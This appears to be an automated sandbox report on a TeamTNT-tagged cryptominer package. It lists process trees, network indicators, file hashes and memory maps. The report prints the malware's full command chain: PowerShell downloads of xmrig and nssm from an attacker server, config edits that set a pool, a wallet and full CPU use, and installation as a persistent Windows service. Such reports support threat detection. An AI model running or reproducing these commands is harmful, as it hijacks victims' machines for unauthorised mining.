C:\Windows\system32\sc.exe

sc delete moneroocean_miner

C:\Windows\system32\taskkill.exe

taskkill /f /t /im xmrig.exe

C:\Windows\system32\timeout.exe

timeout 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri 'http://85.214.149.236:443/sugarcrm/themes/default/images/SugarLogic/win/xmrig.zip' -OutFile 'C:\Users\Admin\xmrig.zip'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\xmrig.zip', 'C:\Users\Admin\moneroocean')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"donate-level\": *\d*,', '\"donate-level\": 1,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"

C:\Users\Admin\moneroocean\xmrig.exe

"C:\Users\Admin\moneroocean\xmrig.exe" --help

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"

C:\Windows\system32\HOSTNAME.EXE

"C:\Windows\system32\HOSTNAME.EXE"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"url\": *\".*\",', '\"url\": \"94.130.12.27:3333\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"user\": *\".*\",', '\"user\": \"438ss2gYTKze7kMqrgUagwEjtm993CVHk1uKHUBZGy6yPaZ2WNe5vdDFXGoVvtf7wcbiAUJix3NR9Ph1aq2NqSgyBkVFEtZ\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"pass\": *\".*\",', '\"pass\": \"WinTendo\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"max-cpu-usage\": *\d*,', '\"max-cpu-usage\": 100,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"log-file\": *null,', '\"log-file\": \"C:\\Users\\Admin\\moneroocean\\xmrig.log\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config_background.json' | %{$_ -replace '\"background\": *false,', '\"background\": true,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config_background.json'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri 'http://85.214.149.236:443/sugarcrm/themes/default/images/SugarLogic/win/nssm.zip' -OutFile 'C:\Users\Admin\nssm.zip'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\nssm.zip', 'C:\Users\Admin\moneroocean')"

C:\Windows\system32\sc.exe

sc stop moneroocean_miner

C:\Windows\system32\sc.exe

sc delete moneroocean_miner

C:\Users\Admin\moneroocean\nssm.exe

"C:\Users\Admin\moneroocean\nssm.exe" install moneroocean_miner "C:\Users\Admin\moneroocean\xmrig.exe"

C:\Users\Admin\moneroocean\nssm.exe

"C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppDirectory "C:\Users\Admin\moneroocean"

C:\Users\Admin\moneroocean\nssm.exe

"C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppPriority BELOW_NORMAL_PRIORITY_CLASS

C:\Users\Admin\moneroocean\nssm.exe

"C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStdout "C:\Users\Admin\moneroocean\stdout"

C:\Users\Admin\moneroocean\nssm.exe

"C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStderr "C:\Users\Admin\moneroocean\stderr"

C:\Users\Admin\moneroocean\nssm.exe

"C:\Users\Admin\moneroocean\nssm.exe" start moneroocean_miner

C:\Users\Admin\moneroocean\nssm.exe

C:\Users\Admin\moneroocean\nssm.exe

C:\Users\Admin\moneroocean\xmrig.exe

"C:\Users\Admin\moneroocean\xmrig.exe"

C:\Windows\system32\timeout.exe

timeout 99999

Network

Country Destination Domain Proto
DE 85.214.149.236:443 85.214.149.236 tcp
US 8.8.8.8:53 time.windows.com udp
NL 40.119.148.38:123 time.windows.com udp
DE 85.214.149.236:443 85.214.149.236 tcp

Files

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\Admin\xmrig.zip

C:\Users\Admin\moneroocean\config.json

C:\Users\Admin\moneroocean\xmrig.exe

C:\Users\Admin\moneroocean\config_background.json
SHA512 2775b438a597684349e09d1abc7f0131491f486b0ec6b7ce5dfd8051672f87a280f12d92b561b84d9dedf14618eedf07febd67123477759ee7a12f024b88c0a8

memory/1272-428-0x0000025A75320000-0x0000025A75322000-memory.dmp

memory/1272-429-0x0000025A75323000-0x0000025A75325000-memory.dmp

memory/4016-426-0x0000020744786000-0x0000020744788000-memory.dmp

C:\Users\Admin\nssm.zip

MD5 7ad31e7d91cc3e805dbc8f0615f713c1
SHA1 9f3801749a0a68ca733f5250a994dea23271d5c3
SHA256 5b12c3838e47f7bc6e5388408a1701eb12c4bbfcd9c19efd418781304590d201
SHA512 d7d947bfa40d6426d8bc4fb30db7b0b4209284af06d6db942e808cc959997cf23523ffef6c44b640f3d8dbe8386ebdc041d0ecb5b74e65af2c2d423df5396260

memory/2936-455-0x0000000000000000-mapping.dmp

memory/2968-456-0x0000000000000000-mapping.dmp

memory/1532-457-0x0000000000000000-mapping.dmp

C:\Users\Admin\moneroocean\nssm.exe

MD5 1136efb1a46d1f2d508162387f30dc4d
SHA1 f280858dcfefabc1a9a006a57f6b266a5d1fde8e
SHA256 eee9c44c29c2be011f1f1e43bb8c3fca888cb81053022ec5a0060035de16d848
SHA512 43b31f600196eaf05e1a40d7a6e14d4c48fc6e55aca32c641086f31d6272d4afb294a1d214e071d5a8cce683a4a88b66a6914d969b40cec55ad88fde4077d3f5

C:\Users\Admin\moneroocean\nssm.exe

MD5 1136efb1a46d1f2d508162387f30dc4d
SHA1 f280858dcfefabc1a9a006a57f6b266a5d1fde8e
SHA256 eee9c44c29c2be011f1f1e43bb8c3fca888cb81053022ec5a0060035de16d848
SHA512 43b31f600196eaf05e1a40d7a6e14d4c48fc6e55aca32c641086f31d6272d4afb294a1d214e071d5a8cce683a4a88b66a6914d969b40cec55ad88fde4077d3f5

C:\Users\Admin\moneroocean\nssm.exe

MD5 1136efb1a46d1f2d508162387f30dc4d
SHA1 f280858dcfefabc1a9a006a57f6b266a5d1fde8e
SHA256 eee9c44c29c2be011f1f1e43bb8c3fca888cb81053022ec5a0060035de16d848
SHA512 43b31f600196eaf05e1a40d7a6e14d4c48fc6e55aca32c641086f31d6272d4afb294a1d214e071d5a8cce683a4a88b66a6914d969b40cec55ad88fde4077d3f5

memory/2884-460-0x0000000000000000-mapping.dmp

memory/1272-462-0x0000025A75326000-0x0000025A75328000-memory.dmp

memory/712-463-0x0000000000000000-mapping.dmp

C:\Users\Admin\moneroocean\nssm.exe

MD5 1136efb1a46d1f2d508162387f30dc4d
SHA1 f280858dcfefabc1a9a006a57f6b266a5d1fde8e
SHA256 eee9c44c29c2be011f1f1e43bb8c3fca888cb81053022ec5a0060035de16d848
SHA512 43b31f600196eaf05e1a40d7a6e14d4c48fc6e55aca32c641086f31d6272d4afb294a1d214e071d5a8cce683a4a88b66a6914d969b40cec55ad88fde4077d3f5

memory/3380-465-0x0000000000000000-mapping.dmp

C:\Users\Admin\moneroocean\nssm.exe

MD5 1136efb1a46d1f2d508162387f30dc4d
SHA1 f280858dcfefabc1a9a006a57f6b266a5d1fde8e
SHA256 eee9c44c29c2be011f1f1e43bb8c3fca888cb81053022ec5a0060035de16d848
SHA512 43b31f600196eaf05e1a40d7a6e14d4c48fc6e55aca32c641086f31d6272d4afb294a1d214e071d5a8cce683a4a88b66a6914d969b40cec55ad88fde4077d3f5

memory/736-467-0x0000000000000000-mapping.dmp

C:\Users\Admin\moneroocean\nssm.exe

MD5 1136efb1a46d1f2d508162387f30dc4d
SHA1 f280858dcfefabc1a9a006a57f6b266a5d1fde8e
SHA256 eee9c44c29c2be011f1f1e43bb8c3fca888cb81053022ec5a0060035de16d848
SHA512 43b31f600196eaf05e1a40d7a6e14d4c48fc6e55aca32c641086f31d6272d4afb294a1d214e071d5a8cce683a4a88b66a6914d969b40cec55ad88fde4077d3f5

memory/1512-469-0x0000000000000000-mapping.dmp

C:\Users\Admin\moneroocean\nssm.exe

MD5 1136efb1a46d1f2d508162387f30dc4d
SHA1 f280858dcfefabc1a9a006a57f6b266a5d1fde8e
SHA256 eee9c44c29c2be011f1f1e43bb8c3fca888cb81053022ec5a0060035de16d848
SHA512 43b31f600196eaf05e1a40d7a6e14d4c48fc6e55aca32c641086f31d6272d4afb294a1d214e071d5a8cce683a4a88b66a6914d969b40cec55ad88fde4077d3f5

C:\Users\Admin\moneroocean\nssm.exe

MD5 1136efb1a46d1f2d508162387f30dc4d
SHA1 f280858dcfefabc1a9a006a57f6b266a5d1fde8e
SHA256 eee9c44c29c2be011f1f1e43bb8c3fca888cb81053022ec5a0060035de16d848
SHA512 43b31f600196eaf05e1a40d7a6e14d4c48fc6e55aca32c641086f31d6272d4afb294a1d214e071d5a8cce683a4a88b66a6914d969b40cec55ad88fde4077d3f5

memory/2576-472-0x0000000000000000-mapping.dmp

C:\Users\Admin\moneroocean\xmrig.exe

MD5 90ba713a657fe704ca05fbcfd967c245
SHA1 020c59739d08b12008554ec48af07ec35d12f178
SHA256 5ba3e2db02b76821bae00056323810032c0ebc1c54b1c93f383e31b3526ee847
SHA512 98c88ffc0909f2bf76c78b46826e2a786f7fe3872f824c7c9e7959987cd5d7b46328b01b526f4431aa047685d5c88fa5172d819d58eed4a457b70e0de023c8d3

memory/2576-475-0x00000000001A0000-0x00000000001A4000-memory.dmp

memory/2436-476-0x0000000000000000-mapping.dmp

Analysis: behavioral19

Detonation Overview

Submitted

2021-10-29 19:08

Reported

2021-10-29 20:00

Platform

win7-en-20211014

Max time kernel

120s

Max time network

150s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\rig_win64\xmrig-6.13.1\start.cmd"

Signatures

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\rig_win64\xmrig-6.13.1\start.cmd"

C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\rig_win64\xmrig-6.13.1\xmrig.exe

xmrig.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 donate.v2.xmrig.com udp
NL 199.247.27.41:3333 donate.v2.xmrig.com tcp

Files

memory/532-55-0x0000000000000000-mapping.dmp

memory/532-56-0x0000000000400000-0x0000000000420000-memory.dmp

memory/532-58-0x00000000004F0000-0x0000000000510000-memory.dmp

memory/532-57-0x0000000000450000-0x0000000000470000-memory.dmp

Analysis: behavioral26

Detonation Overview

Submitted

2021-10-29 19:08

Reported

2021-10-29 20:00

Platform

win10-en-20211014

Max time kernel

121s

Max time network

158s

Command Line

"C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\xmrig\xmrig.exe"

Signatures

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\xmrig\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\xmrig\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\xmrig\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\xmrig\xmrig.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 time.windows.com udp
NL 20.101.57.9:123 time.windows.com udp

Files

memory/4012-116-0x0000000000170000-0x0000000000190000-memory.dmp

memory/4012-117-0x00000000001B0000-0x00000000001B4000-memory.dmp

Analysis: behavioral30

Detonation Overview

Submitted

2021-10-29 19:08

Reported

2021-10-29 20:00

Platform

win7-en-20210920

Max time kernel

122s

Max time network

143s

Command Line

"C:\Users\Admin\AppData\Local\Temp\nssm.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\nssm.exe

"C:\Users\Admin\AppData\Local\Temp\nssm.exe"

Network

N/A

Files

N/A

Analysis: behavioral32

Detonation Overview

Submitted

2021-10-29 19:08

Reported

2021-10-29 19:57

Platform

win7-en-20211014

Max time kernel

0s

Max time network

2s

Command Line

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.13.1\WinRing0x64.sys.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\xmrig-6.13.1\WinRing0x64.sys.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.13.1\WinRing0x64.sys.exe"

Network

N/A

Files

N/A

Analysis: behavioral13

Detonation Overview

Submitted

2021-10-29 19:08

Reported

2021-10-29 20:00

Platform

win7-en-20211014

Max time kernel

121s

Max time network

121s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\init2.bat"

Signatures

Stops running service(s)

evasion

Launches sc.exe

Delays execution with timeout.exe

evasion

Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A

Kills process with taskkill

evasion

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 656 wrote to memory of 704 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 656 wrote to memory of 704 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 656 wrote to memory of 704 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 704 wrote to memory of 1500 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 704 wrote to memory of 1500 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 704 wrote to memory of 1500 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 656 wrote to memory of 1640 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\where.exe
PID 656 wrote to memory of 1640 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\where.exe
PID 656 wrote to memory of 1640 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\where.exe
PID 656 wrote to memory of 856 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\where.exe
PID 656 wrote to memory of 856 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\where.exe
PID 656 wrote to memory of 856 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\where.exe
PID 656 wrote to memory of 636 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\where.exe
PID 656 wrote to memory of 636 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\where.exe
PID 656 wrote to memory of 636 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\where.exe
PID 656 wrote to memory of 1004 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\where.exe
PID 656 wrote to memory of 1004 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\where.exe
PID 656 wrote to memory of 1004 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\where.exe
PID 656 wrote to memory of 880 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\where.exe
PID 656 wrote to memory of 880 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\where.exe
PID 656 wrote to memory of 880 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\where.exe
PID 656 wrote to memory of 1368 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 656 wrote to memory of 1368 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 656 wrote to memory of 1368 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 656 wrote to memory of 740 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\sc.exe
PID 656 wrote to memory of 740 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\sc.exe
PID 656 wrote to memory of 740 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\sc.exe
PID 656 wrote to memory of 1776 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\sc.exe
PID 656 wrote to memory of 1776 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\sc.exe
PID 656 wrote to memory of 1776 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\sc.exe
PID 656 wrote to memory of 1616 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 656 wrote to memory of 1616 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 656 wrote to memory of 1616 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 656 wrote to memory of 836 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 656 wrote to memory of 836 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 656 wrote to memory of 836 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 656 wrote to memory of 1564 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 656 wrote to memory of 1564 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 656 wrote to memory of 1564 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 656 wrote to memory of 2044 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 656 wrote to memory of 2044 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 656 wrote to memory of 2044 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\init2.bat"

C:\Windows\system32\net.exe

net session

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 session

C:\Windows\system32\where.exe

where powershell

C:\Windows\system32\where.exe

where find

C:\Windows\system32\where.exe

where findstr

C:\Windows\system32\where.exe

where tasklist

C:\Windows\system32\where.exe

where sc

C:\Windows\system32\timeout.exe

timeout 2

C:\Windows\system32\sc.exe

sc stop moneroocean_miner

C:\Windows\system32\sc.exe

sc delete moneroocean_miner

C:\Windows\system32\taskkill.exe

taskkill /f /t /im xmrig.exe

C:\Windows\system32\timeout.exe

timeout 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri 'http://85.214.149.236:443/sugarcrm/themes/default/images/SugarLogic/win/xmrig.zip' -OutFile 'C:\Users\Admin\xmrig.zip'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri 'http://85.214.149.236:443/sugarcrm/themes/default/images/SugarLogic/win/xmrig-6.13.1-msvc-win64.zip' -OutFile 'C:\Users\Admin\xmrig.zip'"

Network

N/A

Files


Analysis: behavioral16

Detonation Overview

Submitted

2021-10-29 19:08

Reported

2021-10-29 20:00

Platform

win10-en-20211014

Max time kernel

121s

Max time network

160s

Command Line

"C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\nssm\nssm.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\nssm\nssm.exe

"C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\nssm\nssm.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 time.windows.com udp
NL 20.101.57.9:123 time.windows.com udp

Files

N/A

Analysis: behavioral20

Detonation Overview

Submitted

2021-10-29 19:08

Reported

2021-10-29 20:00

Platform

win10-en-20210920

Max time kernel

122s

Max time network

154s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\rig_win64\xmrig-6.13.1\start.cmd"

Signatures

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\rig_win64\xmrig-6.13.1\start.cmd"

C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\rig_win64\xmrig-6.13.1\xmrig.exe

xmrig.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 donate.v2.xmrig.com udp
NL 199.247.27.41:3333 donate.v2.xmrig.com tcp
US 8.8.8.8:53 time.windows.com udp
NL 20.101.57.9:123 time.windows.com udp

Files

memory/4336-115-0x0000000000000000-mapping.dmp

memory/4336-116-0x000001BE63E60000-0x000001BE63E80000-memory.dmp

memory/4336-117-0x000001BE63F80000-0x000001BE63FA0000-memory.dmp

memory/4336-118-0x000001BE63FB0000-0x000001BE63FD0000-memory.dmp

memory/4336-119-0x000001BE63FD0000-0x000001BE63FF0000-memory.dmp

Analysis: behavioral21

Detonation Overview

Submitted

2021-10-29 19:08

Reported

2021-10-29 20:00

Platform

win7-en-20210920

Max time kernel

117s

Max time network

160s

Command Line

"C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\rig_win64\xmrig-6.13.1\xmrig.exe"

Signatures

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\rig_win64\xmrig-6.13.1\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\rig_win64\xmrig-6.13.1\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\rig_win64\xmrig-6.13.1\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\rig_win64\xmrig-6.13.1\xmrig.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 donate.v2.xmrig.com udp
NL 199.247.27.41:3333 donate.v2.xmrig.com tcp

Files

memory/576-54-0x00000000000F0000-0x0000000000110000-memory.dmp

memory/576-55-0x0000000000390000-0x00000000003B0000-memory.dmp

memory/576-56-0x0000000000690000-0x00000000006B0000-memory.dmp

Analysis: behavioral9

Detonation Overview

Submitted

2021-10-29 19:08

Reported

2021-10-29 19:57

Platform

debian9-mipsbe-en-20211025

Max time kernel

0s

Command Line

[/tmp/198103836/payload.dat]

Signatures

N/A

Processes

/tmp/198103836/payload.dat

[/tmp/198103836/payload.dat]

Network

N/A

Files

N/A

Analysis: behavioral15

Detonation Overview

Submitted

2021-10-29 19:08

Reported

2021-10-29 20:00

Platform

win7-en-20211014

Max time kernel

118s

Max time network

130s

Command Line

"C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\nssm\nssm.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\nssm\nssm.exe

"C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\nssm\nssm.exe"

Network

N/A

Files

N/A

Analysis: behavioral8

Detonation Overview

Submitted

2021-10-29 19:08

Reported

2021-10-29 19:57

Platform

debian9-mipsel-en-20211025

Max time kernel

0s

Command Line

[/tmp/138283075/payload.dat]

Signatures

N/A

Processes

/tmp/138283075/payload.dat

[/tmp/138283075/payload.dat]

Network

N/A

Files

N/A

Analysis: behavioral24

Detonation Overview

Submitted

2021-10-29 19:08

Reported

2021-10-29 19:57

Platform

win10-en-20211014

Max time kernel

15s

Max time network

23s

Command Line

"C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\xmrig\WinRing0x64.sys.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\xmrig\WinRing0x64.sys.exe

"C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\xmrig\WinRing0x64.sys.exe"

Network

Country Destination Domain Proto
IE 52.109.76.32:443 tcp
US 8.8.8.8:53 time.windows.com udp
NL 40.119.148.38:123 time.windows.com udp

Files

N/A

Analysis: behavioral28

Detonation Overview

Submitted

2021-10-29 19:08

Reported

2021-10-29 19:57

Platform

ubuntu1804-amd64-en-20211025

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

N/A

Files

N/A

Analysis: behavioral17

Detonation Overview

Submitted

2021-10-29 19:08

Reported

2021-10-29 19:57

Platform

win7-en-20211014

Max time kernel

7s

Max time network

0s

Command Line

"C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\rig_win64\xmrig-6.13.1\WinRing0x64.sys.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\rig_win64\xmrig-6.13.1\WinRing0x64.sys.exe

"C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\rig_win64\xmrig-6.13.1\WinRing0x64.sys.exe"

Network

N/A

Files

N/A

Analysis: behavioral22

Detonation Overview

Submitted

2021-10-29 19:08

Reported

2021-10-29 20:00

Platform

win10-en-20211014

Max time kernel

122s

Max time network

158s

Command Line

"C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\rig_win64\xmrig-6.13.1\xmrig.exe"

Signatures

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\rig_win64\xmrig-6.13.1\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\rig_win64\xmrig-6.13.1\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\rig_win64\xmrig-6.13.1\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\rig_win64\xmrig-6.13.1\xmrig.exe"

Network

Country Destination Domain Proto
IE 52.109.76.30:443 tcp
US 8.8.8.8:53 donate.v2.xmrig.com udp
NL 178.128.242.134:3333 donate.v2.xmrig.com tcp
US 8.8.8.8:53 time.windows.com udp
NL 20.101.57.9:123 time.windows.com udp

Files

memory/3960-118-0x000001D7A4710000-0x000001D7A4730000-memory.dmp

memory/3960-119-0x000001D7A4740000-0x000001D7A4760000-memory.dmp

memory/3960-121-0x000001D7A4790000-0x000001D7A47B0000-memory.dmp

memory/3960-120-0x000001D7A4770000-0x000001D7A4790000-memory.dmp

Analysis: behavioral23

Detonation Overview

Submitted

2021-10-29 19:08

Reported

2021-10-29 19:57

Platform

win7-en-20210920

Max time kernel

5s

Max time network

5s

Command Line

"C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\xmrig\WinRing0x64.sys.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\xmrig\WinRing0x64.sys.exe

